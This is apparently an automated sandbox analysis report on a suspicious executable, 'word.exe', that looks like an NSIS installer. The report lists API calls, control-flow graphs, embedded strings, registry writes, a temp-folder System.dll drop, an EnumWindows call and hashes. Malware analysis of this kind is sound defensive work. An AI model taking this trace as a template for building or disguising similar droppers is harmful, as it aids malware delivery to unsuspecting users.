                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                          • String ID: C:\Users\user\spherosome\preadoption\preembodiment\Himlede
                                                          • API String ID: 123533781-3180547735
                                                          • Opcode ID: 67eeef5bfe48d64c696600bc04f6a24e74d7f241817d7ead55992a07deef4c16
                                                          • Instruction ID: 8923a1fbb4e768f6885cfedd98bdb4ab1c3b58066d3a845fdfa0f70482a78e56
                                                          • Opcode Fuzzy Hash: 67eeef5bfe48d64c696600bc04f6a24e74d7f241817d7ead55992a07deef4c16
                                                          • Instruction Fuzzy Hash: 02416D71A00209BFCB40DFA4CE88E9E7BB5BF48354B2042A9F911FB2D1D6799D41DB54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b324f5448a4cd5c229321874d8756ea75b0658bb7580570e0968ebdfa53b276b
                                                          • Instruction ID: b03426f2c8dea12abf8fb2d8b94ab036f7606c67c5ec72f888080e52c6ca951d
                                                          • Opcode Fuzzy Hash: b324f5448a4cd5c229321874d8756ea75b0658bb7580570e0968ebdfa53b276b
                                                          • Instruction Fuzzy Hash: 3FF15470D00229CBCF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF45
                                                          APIs
                                                          • FindFirstFileA.KERNELBASE(?,00421548,C:\,004058B2,C:\,C:\,00000000,C:\,C:\,?,?,77582EE0,004055D1,?,C:\Users\user\AppData\Local\Temp\,77582EE0), ref: 00406000
                                                          • FindClose.KERNEL32(00000000), ref: 0040600C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: C:\
                                                          • API String ID: 2295610775-3404278061
                                                          • Opcode ID: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
                                                          • Instruction ID: a10b3c54e235fed7265b7e368dd63080585aa0dd988869772eea30aa6a37580d
                                                          • Opcode Fuzzy Hash: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
                                                          • Instruction Fuzzy Hash: 2DD012319590306BC3105F786D0C85B7A589B993317618A33B466F62F0C7388D629AE9
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
                                                          • LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 00406039
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040604A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                          • String ID:
                                                          • API String ID: 310444273-0
                                                          • Opcode ID: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                                          • Instruction ID: d05ccde32c27ce198b4ddd6d941ac6fef01cdbbca41556c28887b76fd68ddc7b
                                                          • Opcode Fuzzy Hash: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                                          • Instruction Fuzzy Hash: 0AE0CD3290411167C320AB749D44E3B73ACAFC5750305483DF506F2151D734AC11E7AD

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 118 403787-40379f call 40601c 121 4037a1-4037b1 call 405c4f 118->121 122 4037b3-4037e4 call 405bd8 118->122 129 403807-403830 call 403a4c call 40586f 121->129 127 4037e6-4037f7 call 405bd8 122->127 128 4037fc-403802 lstrcatA 122->128 127->128 128->129 136 403836-40383b 129->136 137 4038b7-4038bf call 40586f 129->137 136->137 138 40383d-403861 call 405bd8 136->138 143 4038c1-4038c8 call 405d13 137->143 144 4038cd-4038f2 LoadImageA 137->144 138->137 145 403863-403865 138->145 143->144 147 403973-40397b call 40140b 144->147 148 4038f4-403924 RegisterClassA 144->148 150 403876-403882 lstrlenA 145->150 151 403867-403874 call 4057ac 145->151 159 403985-403990 call 403a4c 147->159 160 40397d-403980 147->160 152 403a42 148->152 153 40392a-40396e SystemParametersInfoA CreateWindowExA 148->153 157 403884-403892 lstrcmpiA 150->157 158 4038aa-4038b2 call 405781 call 405cf1 150->158 151->150 155 403a44-403a4b 152->155 153->147 157->158 163 403894-40389e GetFileAttributesA 157->163 158->137 171 403996-4039b3 ShowWindow LoadLibraryA 159->171 172 403a19-403a21 call 4050ae 159->172 160->155 164 4038a0-4038a2 163->164 165 4038a4-4038a5 call 4057c8 163->165 164->158 164->165 165->158 174 4039b5-4039ba LoadLibraryA 171->174 175 4039bc-4039ce GetClassInfoA 171->175 179 403a23-403a29 172->179 180 403a3b-403a3d call 40140b 172->180 174->175 177 4039d0-4039e0 GetClassInfoA RegisterClassA 175->177 178 4039e6-403a17 DialogBoxParamA call 40140b call 4036d7 175->178 177->178 178->155 179->160 182 403a2f-403a36 call 40140b 179->182 180->152 182->160
                                                          APIs
                                                            • Part of subcall function 0040601C: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
                                                            • Part of subcall function 0040601C: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 00406039
                                                            • Part of subcall function 0040601C: GetProcAddress.KERNEL32(00000000,?), ref: 0040604A
                                                          • lstrcatA.KERNEL32(1033,0041FCF8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCF8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,77583410,"C:\Users\user\Desktop\word.exe",00000000), ref: 00403802
                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\spherosome\preadoption\preembodiment,1033,0041FCF8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCF8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403877
                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 0040388A
                                                          • GetFileAttributesA.KERNEL32(Call), ref: 00403895
                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\spherosome\preadoption\preembodiment), ref: 004038DE
                                                            • Part of subcall function 00405C4F: wsprintfA.USER32 ref: 00405C5C
                                                          • RegisterClassA.USER32(00422EA0), ref: 0040391B
                                                          • SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 00403933
                                                          • CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403968
                                                          • ShowWindow.USER32(00000005,00000000), ref: 0040399E
                                                          • LoadLibraryA.KERNEL32(RichEd20), ref: 004039AF
                                                          • LoadLibraryA.KERNEL32(RichEd32), ref: 004039BA
                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039CA
                                                          • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039D7
                                                          • RegisterClassA.USER32(00422EA0), ref: 004039E0
                                                          • DialogBoxParamA.USER32(?,00000000,00403B19,00000000), ref: 004039FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\word.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\spherosome\preadoption\preembodiment$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 914957316-1990353284
                                                          • Opcode ID: 055baf77df7a5e45cba707c16d51d4eb88bfad4ce7f21b2f580e300121f2fe1e
                                                          • Instruction ID: 105b881253acfb20a149285e15a71ffac9a88723c4648682b83d6f47b67848ff
                                                          • Opcode Fuzzy Hash: 055baf77df7a5e45cba707c16d51d4eb88bfad4ce7f21b2f580e300121f2fe1e
                                                          • Instruction Fuzzy Hash: CC61D6B16442007EE720AF619D45F273EACEB8475AF40407FF945B22E1D67CAD02DA2E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 189 402c79-402cc7 GetTickCount GetModuleFileNameA call 405982 192 402cd3-402d01 call 405cf1 call 4057c8 call 405cf1 GetFileSize 189->192 193 402cc9-402cce 189->193 201 402df1-402dff call 402bda 192->201 202 402d07-402d1e 192->202 194 402f18-402f1c 193->194 208 402ed0-402ed5 201->208 209 402e05-402e08 201->209 204 402d20 202->204 205 402d22-402d2f call 4031b6 202->205 204->205 213 402d35-402d3b 205->213 214 402e8c-402e94 call 402bda 205->214 208->194 211 402e34-402e80 GlobalAlloc call 4060fc call 4059b1 CreateFileA 209->211 212 402e0a-402e22 call 4031cc call 4031b6 209->212 239 402e82-402e87 211->239 240 402e96-402ec6 call 4031cc call 402f1f 211->240 212->208 237 402e28-402e2e 212->237 218 402dbb-402dbf 213->218 219 402d3d-402d55 call 40593d 213->219 214->208 222 402dc1-402dc7 call 402bda 218->222 223 402dc8-402dce 218->223 219->223 236 402d57-402d5e 219->236 222->223 228 402dd0-402dde call 40608e 223->228 229 402de1-402deb 223->229 228->229 229->201 229->202 236->223 241 402d60-402d67 236->241 237->208 237->211 239->194 249 402ecb-402ece 240->249 241->223 243 402d69-402d70 241->243 243->223 244 402d72-402d79 243->244 244->223 246 402d7b-402d9b 244->246 246->208 248 402da1-402da5 246->248 250 402da7-402dab 248->250 251 402dad-402db5 248->251 249->208 252 402ed7-402ee8 249->252 250->201 250->251 251->223 253 402db7-402db9 251->253 254 402ef0-402ef5 252->254 255 402eea 252->255 253->223 256 402ef6-402efc 254->256 255->254 256->256 257 402efe-402f16 call 40593d 256->257 257->194
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402C8D
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\word.exe,00000400), ref: 00402CA9
                                                            • Part of subcall function 00405982: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\word.exe,80000000,00000003), ref: 00405986
                                                            • Part of subcall function 00405982: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8
                                                          • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\word.exe,C:\Users\user\Desktop\word.exe,80000000,00000003), ref: 00402CF2
                                                          • GlobalAlloc.KERNELBASE(?,00409130), ref: 00402E39
                                                          Strings
                                                          • "C:\Users\user\Desktop\word.exe", xrefs: 00402C79
                                                          • Null, xrefs: 00402D72
                                                          • C:\Users\user\Desktop\word.exe, xrefs: 00402C93, 00402CA2, 00402CB6, 00402CD3
                                                          • soft, xrefs: 00402D69
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED0
                                                          • Inst, xrefs: 00402D60
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C86, 00402E51
                                                          • C:\Users\user\Desktop, xrefs: 00402CD4, 00402CD9, 00402CDF
                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E82
                                                          • Error launching installer, xrefs: 00402CC9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\word.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\word.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                          • API String ID: 2803837635-2932541745
                                                          • Opcode ID: 9a1918b45dc2591702618bea9aed4c2f7de89d0b4c56eebfc9df6ac8145067ba
                                                          • Instruction ID: a3297f7e43c120df5600b6fd5f4255024b2ca4e5a22dc20eb426d949fad314b7
                                                          • Opcode Fuzzy Hash: 9a1918b45dc2591702618bea9aed4c2f7de89d0b4c56eebfc9df6ac8145067ba
                                                          • Instruction Fuzzy Hash: E661C671A40205ABDF20AF64DE89B9A76B4EF00315F60413BF904B72D1D7BC9E419BAD
                                                          APIs
                                                            • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(?,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                          • GlobalAlloc.KERNELBASE(?,000014A4), ref: 10001B67
                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                          • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                          • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                          • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                          • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1815724658.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1815689617.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1815766207.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1815813652.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_word.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                          • String ID:
                                                          • API String ID: 4227406936-0
                                                          • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                          • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                          • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                          • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 591 40173f-401762 call 4029fd call 4057ee 596 401764-40176a call 405cf1 591->596 597 40176c-40177e call 405cf1 call 405781 lstrcatA 591->597 602 401783-401789 call 405f5c 596->602 597->602 607 40178e-401792 602->607 608 401794-40179e call 405ff5 607->608 609 4017c5-4017c8 607->609 616 4017b0-4017c2 608->616 617 4017a0-4017ae CompareFileTime 608->617 611 4017d0-4017ec call 405982 609->611 612 4017ca-4017cb call 40595d 609->612 619 401864-40188d call 404fdc call 402f1f 611->619 620 4017ee-4017f1 611->620 612->611 616->609 617->616 634 401895-4018a1 SetFileTime 619->634 635 40188f-401893 619->635 621 4017f3-401835 call 405cf1 * 2 call 405d13 call 405cf1 call 405505 620->621 622 401846-401850 call 404fdc 620->622 621->607 655 40183b-40183c 621->655 632 401859-40185f 622->632 636 40289b 632->636 638 4018a7-4018b2 CloseHandle 634->638 635->634 635->638 642 40289d-4028a1 636->642 640 402892-402895 638->640 641 4018b8-4018bb 638->641 640->636 644 4018d0-4018d3 call 405d13 641->644 645 4018bd-4018ce call 405d13 lstrcatA 641->645 649 4018d8-40222b call 405505 644->649 645->649 649->642 655->632 657 40183e-40183f 655->657 657->622
                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\spherosome\preadoption\preembodiment\Himlede,00000000,00000000,00000031), ref: 0040177E
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\spherosome\preadoption\preembodiment\Himlede,00000000,00000000,00000031), ref: 004017A8
                                                            • Part of subcall function 00405CF1: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405CFE
                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
                                                            • Part of subcall function 00404FDC: lstrcatA.KERNEL32(0041F4D8,00402C51,00402C51,0041F4D8,00000000,00000000,00000000), ref: 00405038
                                                            • Part of subcall function 00404FDC: SetWindowTextA.USER32(0041F4D8,0041F4D8), ref: 0040504A
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsy9448.tmp$C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll$C:\Users\user\spherosome\preadoption\preembodiment\Himlede$Call$user32::EnumWindows(i r1 ,i 0)
                                                          • API String ID: 1941528284-3193061312
                                                          • Opcode ID: e031dc2ebf519e94a1e2f00937ded2b8ce85dfd93a4ffebdd769cee2c96c1e4a
                                                          • Instruction ID: 6271ed47795bff7848a1184a65af423285d25a4990901b96ed448ffc086cd7e6
                                                          • Opcode Fuzzy Hash: e031dc2ebf519e94a1e2f00937ded2b8ce85dfd93a4ffebdd769cee2c96c1e4a
                                                          • Instruction Fuzzy Hash: 4E41C371900615BBCF10BFA5DC46EAF3669DF41368B20823BF521B20E1D63C8A419B6D

                                                          Control-flow Graph

                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401D29
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                          • CreateFontIndirectA.GDI32(0040A7D0), ref: 00401DA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Tahoma
                                                          • API String ID: 3808545654-3580928618
                                                          • Opcode ID: 8273c5010cf8a0948b2452c9b404e63bb4d9846eead8e2b8c23fb773179617ee
                                                          • Instruction ID: 34424dcacaa19df80ac017e3b34477b9893efc0acb885e50cf323370767d2cbe
                                                          • Opcode Fuzzy Hash: 8273c5010cf8a0948b2452c9b404e63bb4d9846eead8e2b8c23fb773179617ee
                                                          • Instruction Fuzzy Hash: 05011271948340AFE701DBB0AE0AB9A7F74EB19705F108435F141B72E2C6B954159B2F

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 705 40231c-402362 call 402af2 call 4029fd * 2 RegCreateKeyExA 712 402892-4028a1 705->712 713 402368-402370 705->713 714 402380-402383 713->714 715 402372-40237f call 4029fd lstrlenA 713->715 718 402393-402396 714->718 719 402385-402392 call 4029e0 714->719 715->714 721 4023a7-4023bb RegSetValueExA 718->721 722 402398-4023a2 call 402f1f 718->722 719->718 727 4023c0-402496 RegCloseKey 721->727 728 4023bd 721->728 722->721 727->712 730 402663-40266a 727->730 728->727 730->712
                                                          APIs
                                                          • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsy9448.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                                          • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsy9448.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsy9448.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
